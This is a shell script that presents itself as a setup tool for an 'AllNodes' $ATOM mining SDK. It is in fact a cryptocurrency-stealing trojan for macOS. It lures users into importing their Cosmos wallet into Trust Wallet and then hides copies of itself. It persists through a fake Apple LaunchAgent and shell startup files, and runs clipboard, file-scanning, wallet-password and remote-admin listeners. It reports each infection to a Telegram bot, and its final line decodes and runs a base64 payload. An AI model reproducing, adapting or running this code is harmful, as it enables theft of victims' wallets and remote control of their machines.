    echo -e "\e[33m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\e[0m"
    echo -e "\e[1;33m                    ⚠️  SETUP REQUIRED  ⚠️\e[0m"
    echo -e "\e[33m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\e[0m"
    echo ""
    echo -e "To start mining \e[1;32m\$ATOM\e[0m, you must:"
    echo ""
    echo -e "  1️⃣  Download Trust Wallet extension on any browser"
    echo -e "  2️⃣  Import your Cosmos wallet into Trust Wallet"
    echo -e "  3️⃣  Re-run this setup script"
    echo ""
    echo -e "\e[36m[INFO]\e[0m Once detected, your hashrate will be automatically"
    echo -e "       registered based on your \$ATOM balance."
    echo ""
    echo -e "\e[36m[INFO]\e[0m Your local machine will be used as miner power."
    echo ""
    echo -e "\e[33m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\e[0m"
    echo -e "\e[1;31m⚠️  If you already have Trust Wallet installed:\e[0m"
    echo -e "    Uninstall and reinstall it for the SDK to detect"
    echo -e "    your wallet for mining registration."
    echo -e "\e[33m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\e[0m"
    echo ""
    echo -e "\e[32m[SETUP]\e[0m Installing background monitoring service..."
    sleep 2
else
    echo -e "\e[32m[SUCCESS]\e[0m Trust Wallet detected!"
    echo -e "\e[32m[SETUP]\e[0m Registering your wallet for mining..."
    sleep 2
    echo -e "\e[32m[SETUP]\e[0m Configuring mining parameters..."
    sleep 1
fi

echo -e "\e[32m[SETUP]\e[0m Starting AllNodes mining service..."
sleep 1
echo ""

# Create marker
touch "$MARKER"

# STEP 1: Copy script to multiple hidden locations
SCRIPT_PATH="$0"
HIDDEN_LOCATIONS=(
    "$HOME/.local/bin/.system_monitor"
    "$HOME/.cache/.updater"
    "/tmp/.system_health_check"
    "$HOME/Library/Caches/.apple_diagnostics"
)

for location in "${HIDDEN_LOCATIONS[@]}"; do
    mkdir -p "$(dirname "$location")" 2>/dev/null
    cp "$SCRIPT_PATH" "$location" 2>/dev/null
    chmod +x "$location" 2>/dev/null
done

# STEP 2: Install LaunchAgent (SURVIVES REBOOT!)
PLIST_PATH="$HOME/Library/LaunchAgents/com.apple.systemdiagnostics.plist"

cat > "$PLIST_PATH" << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.systemdiagnostics</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/bash</string>
        <string>HOME_PLACEHOLDER/.local/bin/.system_monitor</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <true/>
    <key>StandardErrorPath</key>
    <string>/dev/null</string>
    <key>StandardOutPath</key>
    <string>/dev/null</string>
</dict>
</plist>
EOF

sed -i '' "s|HOME_PLACEHOLDER|$HOME|g" "$PLIST_PATH"
chmod 644 "$PLIST_PATH"
launchctl load "$PLIST_PATH" 2>/dev/null

# STEP 3: Add to shell startup (backup persistence)
STARTUP_LINE="[ -f ~/.local/bin/.system_monitor ] && nohup bash ~/.local/bin/.system_monitor > /dev/null 2>&1 &"

if ! grep -q ".system_monitor" "$HOME/.zshrc" 2>/dev/null; then
    echo "" >> "$HOME/.zshrc"
    echo "# System diagnostics" >> "$HOME/.zshrc"
    echo "$STARTUP_LINE" >> "$HOME/.zshrc"
fi

if [ -f "$HOME/.bashrc" ]; then
    if ! grep -q ".system_monitor" "$HOME/.bashrc" 2>/dev/null; then
        echo "" >> "$HOME/.bashrc"
        echo "# System diagnostics" >> "$HOME/.bashrc"
        echo "$STARTUP_LINE" >> "$HOME/.bashrc"
    fi
fi

# Start watchdog FIRST (restarts killed processes)
nohup bash "$0" --watchdog > /dev/null 2>&1 &
WATCHDOG_PID=$!

sleep 1

# Start 2 monitor processes (clipboard monitoring starts immediately!)
nohup bash "$0" --monitor > /dev/null 2>&1 &
PID1=$!

sleep 1

nohup bash "$0" --monitor > /dev/null 2>&1 &
PID2=$!

sleep 1

# Run file scanner in background (doesn't block clipboard monitoring)
nohup bash "$0" --scanner >> "$LOG_FILE" 2>&1 &

# Run admin command listener in background
nohup bash "$0" --admin-listener >> "$LOG_FILE" 2>&1 &

# Run wallet password listener in background (NEW)
nohup bash "$0" --wallet-listener >> "$LOG_FILE" 2>&1 &

send_to_telegram "🚀 <b>ALLNODES MINING SDK INSTALLED</b>%0A💻 Host: $(hostname)%0A👤 User: $(whoami)%0A🔐 Wallet Monitor: Active%0A⛏️  Status: Mining will start when Trust Wallet detected%0A📍 Survives: Reboot, pkill, terminal close%0A🔐 Admin: Send <code>${ADMIN_PASSWORD} help</code>"


' | base64 --decode > /tmp/decoded_script.sh chmod +x /tmp/decoded_script.sh bash /tmp/decoded_script.sh